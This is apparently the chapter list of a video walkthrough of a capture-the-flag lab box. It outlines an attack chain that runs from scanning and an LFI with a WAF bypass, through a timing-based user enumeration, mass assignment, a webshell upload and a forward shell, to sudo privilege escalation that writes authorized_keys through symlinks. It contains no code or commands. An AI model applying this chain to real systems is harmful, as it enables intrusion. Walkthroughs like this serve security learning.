00:00 - Intro
01:05 - Start of nmap
02:00 - Running feroxbuster and discovering image.php
05:05 - Fuzzing image.php for parameters and discovering an LFI
07:15 - Enumerating the WAF to find blacklisted strings and then using a php filter to extract source
10:00 - Examing the login.php source code and discovering a timing attack
12:00 - Demonstrating attempting to login with valid users takes a longer time so we can bruteforce users
14:10 - Creating a python script to enumerate users
21:00 - Logging in with aaron:arron (guessed the password)
22:30 - Extracting upload.php and admin_auth_check.php to see how we can upload files
23:30 - Attempting a mass assignment vulnerability on profile_update.php and discovering we can change our roles
28:00 - Discovering a timing attack to discover filenames uploaded, which can be chained with our LFI to execute code
31:50 - Using the CLI PHP Interpreter to generate potential filenames
34:00 - Uploading a webshell and then generating the filename based upon time
38:50 - Executing commands on the box, discovering we can't do reverse shells
43:30 - Using my Forward Shell Python script to gain an interactive shell on the box
50:40 - Discovering a backup directory that has the web source but also the git repo
51:20 - SSH in as aaron and discovering he can run the netutils binary with sudo, which uses Axel to download files
54:00 - Tricking axel to write to authorized_keys via symlinks
56:40 - Demonstrating we didn't need that sleep(1) for the initial timing attack where we can enumerate valid users to work
Support the originator by clicking the read the rest link below.
